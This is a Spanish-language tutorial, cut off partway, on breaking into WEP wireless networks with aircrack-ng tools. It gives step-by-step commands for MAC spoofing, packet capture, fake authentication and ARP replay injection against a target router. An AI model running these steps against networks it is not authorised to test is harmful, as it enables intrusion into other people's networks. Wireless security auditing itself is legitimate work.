Auditoria web
Nos Vamos al menú y entramos a Backtrack->Radio Network Analysis->80211->All->Airmon-ng
Esto es para que nos detecte la Tarjeta WirelessUSB
Ver redes -* Abrir Terminal*-
airmon-ng
Detener tarjeta en donde se va a capturar
airmon-ng stop wlan0 ifconfig wlan0 down
Cambiar la MAC
macchanger --mac 00:11:22:33:44:55 wlan0Habilitar la tarjeta después del cambio
airmon-ng start wlan0
Escaneo redes al alcance
airodump-ng wlan0
BSSID MAC del router que da la señal. PWR Poder de señal. CHN Canal que se encuentra la red. ENCR Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP . ESSID Nombre de la red inalámbrica.
Detener el escaneo de redes
Ctrl + C y copiar el BSSID.
Capturar paquetesairodump-ng -c X -w NombreArchivo --bssid MACDeLaRed wlan0
-c es el número del canal de la red que estamos auditando. -w es el archivo donde se van a guardar los paquetes que captures. --bssid esla MAC del router de la red que estamos auditando. wlan0 es nuestra tarjeta inalámbrica.
No hay tráfico, entonces hay que Inyectar tráfico -*Abrir Otra Terminal*Conexión al Router
aireplay-ng-1 0 -a MACDeLaRed -h MiMAC -e NombreDeLaRed wlan0
-a es el BSSID de la red que estamos atacando.
-h MiMAC es la MAC que le introducimos a nuestra tarjeta de red inalámbrica. recordando que la MACque le pusimos es 00:11:22:33:44:55 -e es el nombre de la red que estamos auditando. Conexión esta succesfull, esto significa que estas conectado en capa 2 al router. Cita: Si por alguna razón no sepuede conectar algunas de las razones son las siguientes: -La red a la que quieres atacar está muy lejos. -Tu tarjeta de red no puede hacer inyección de paquetes. -El router tiene seguridad para evitareste tipo de ataques.
Inyectar tráfico
aireplay-ng -3 -b MACDeLaRed -h MiMAC wlan0
-b es el BSSID de la red que estamos atacando. -h es la MAC falsa que le introducimos a nuestra tarjeta de...
Regístrate para leer el documento completo.